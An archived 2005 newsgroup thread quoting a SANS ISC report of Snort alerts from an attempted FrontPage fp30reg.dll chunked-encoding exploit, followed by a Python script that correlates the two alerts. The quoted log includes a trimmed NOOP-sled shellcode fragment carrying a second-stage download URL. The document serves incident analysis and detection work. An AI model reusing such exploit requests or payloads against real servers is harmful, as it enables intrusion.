Home > Archive > FrontPage Server Extensions for Windows > June 2005 > unusual FrontPage traffic caught in SNORT- http://isc.sans.org/
There was a posting to http://isc.sans.org/ about unusual traffic captured in
SNORT in relation to a FRONTPAGE attack. Wondering if anyone from MS is
monitoring this and/or if anyone else is seeing this.
Also, SP1 for 2003 server updates the extensions that originally come with
the 2003 server. What are the upgrades?
Thanks.
Here was the post:
Unusual FrontPage Hack
Ryan Barnett (CIS Apache Benchmark Project Lead) writes in with some Snort
logs indicating an attempted Front Page hack on a system he is monitoring.
The first entry indicates an attempt to exploit the chunked-encoding
transfer bug:
[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Host: 192.168.1.100
...Transfer-Encoding: chunked..Content-Length: 1499....
Which is a normal scan I'm sure many readers are familiar with. The unusual
bit is an x86 NOOP alert that followed:
[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
5db.........................g...................................
.................................................................
.................................................................
.................................................................
.................g...............................................
.......Ehttp://10.10.2.2:191/lsd.080/lsd..b.]3.f....u.....<.u.F..
,0F4...G..............q................rh.B.f..............q....
This output has been trimmed for space. Ryan indicates that there is no
internal host at 10.10.2.2 listening on port 191. If there are any other
readers with similar log entries matching port 191 or the /lsd.* URL, please
send them our way.
"R" wrote:
> There was a posting to http://isc.sans.org/ about unusual traffic captured in
> SNORT in relation to a FRONTPAGE attack. Wondering if anyone from MS is
> monitoring this and or if anyone else is seeing this.
>
> Also, SP1 for 2003 server updates the extensions that originally come with
> the 2003 server. What are the upgrades?
>
> Thanks.
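The ISC entry quoted above is interesting precisely because of the sequence: a chunked-encoding POST to fp30reg.dll followed within milliseconds, on the same TCP connection, by an x86 NOOP sled alert. Either rule on its own is noisy (NOOP signatures fire on plenty of benign binary uploads), but the two back-to-back from one source are a much stronger signal. The script below is an added example, not part of the thread or of the ISC diary: it parses Snort full-alert headers of the shape shown above and flags a source that triggers the chunked-encoding rule and then the NOOP rule against the same host and port inside a short window. The sample alert text is constructed from the two alerts quoted above plus a third, stand-alone NOOP alert from a made-up source (10.0.0.5) to show that an isolated NOOP hit is not reported; the rule names, the time window and the assumed year (2005, from the thread date, since Snort timestamps carry no year) are assumptions of the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample input in Snort's full-alert format. The first two alerts
# mirror the ones quoted in the ISC post; the third is an isolated NOOP alert
# from a made-up internal source, included to show it is NOT correlated.
SAMPLE_ALERTS = """\
[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20

[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20

[**] SHELLCODE x86 NOOP [**]
06/20-23:50:01.000000 10.0.0.5:51000 -> 192.168.1.100:80
TCP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x00000001 Ack: 0x00000002 Win: 0xFFFF TcpLen: 20
"""

# Rule messages to chain (assumed names, matching the alerts quoted above).
STAGE_ONE = "WEB-MISC Chunked-Encoding transfer attempt"
STAGE_TWO = "SHELLCODE x86 NOOP"

# "[**] <message> [**]" header line of a full-format Snort alert.
HEADER_RE = re.compile(r"^\[\*\*\]\s+(?P<msg>.+?)\s+\[\*\*\]$")
# "MM/DD-HH:MM:SS.usec src:sport -> dst:dport" flow line that follows it.
FLOW_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


@dataclass(frozen=True)
class Alert:
    msg: str
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def parse_alerts(text, year=2005):
    """Extract (message, timestamp, 5-tuple) from each alert; other lines are skipped.

    Snort timestamps have no year, so the caller supplies one (assumed 2005 here).
    """
    alerts = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        head = HEADER_RE.match(lines[i].strip())
        if head and i + 1 < len(lines):
            flow = FLOW_RE.match(lines[i + 1].strip())
            if flow:
                ts = datetime.strptime(flow["ts"], "%m/%d-%H:%M:%S.%f").replace(year=year)
                alerts.append(Alert(head["msg"], ts, flow["src"], int(flow["sport"]),
                                    flow["dst"], int(flow["dport"])))
                i += 2
                continue
        i += 1
    return alerts


def correlate(alerts, window_seconds=2.0):
    """Return (src, dst, dport) for every NOOP alert that follows a chunked-encoding
    alert from the same source to the same destination service within the window.

    An isolated NOOP alert (no preceding stage-one hit from that source) is ignored,
    which is what keeps the noisy shellcode rule from flooding the result.
    """
    hits = []
    ordered = sorted(alerts, key=lambda a: a.ts)
    for idx, noop in enumerate(ordered):
        if noop.msg != STAGE_TWO:
            continue
        for earlier in ordered[:idx]:
            if (earlier.msg == STAGE_ONE
                    and earlier.src == noop.src
                    and earlier.dst == noop.dst
                    and earlier.dport == noop.dport
                    and 0 <= (noop.ts - earlier.ts).total_seconds() <= window_seconds):
                hits.append((noop.src, noop.dst, noop.dport))
                break
    return hits


if __name__ == "__main__":
    for src, dst, dport in correlate(parse_alerts(SAMPLE_ALERTS)):
        print(f"chunked-encoding POST followed by NOOP sled: {src} -> {dst}:{dport}")
```

Run against the sample, only the 66.161.76.150 pair is reported; the lone NOOP alert from 10.0.0.5 drops out because nothing from that source tripped the first rule. On a real sensor the same two-stage pattern could be expressed directly in Snort's own event filtering, but doing it in a post-processing script makes the window and the rule pairing easy to tune while reviewing a day of alerts.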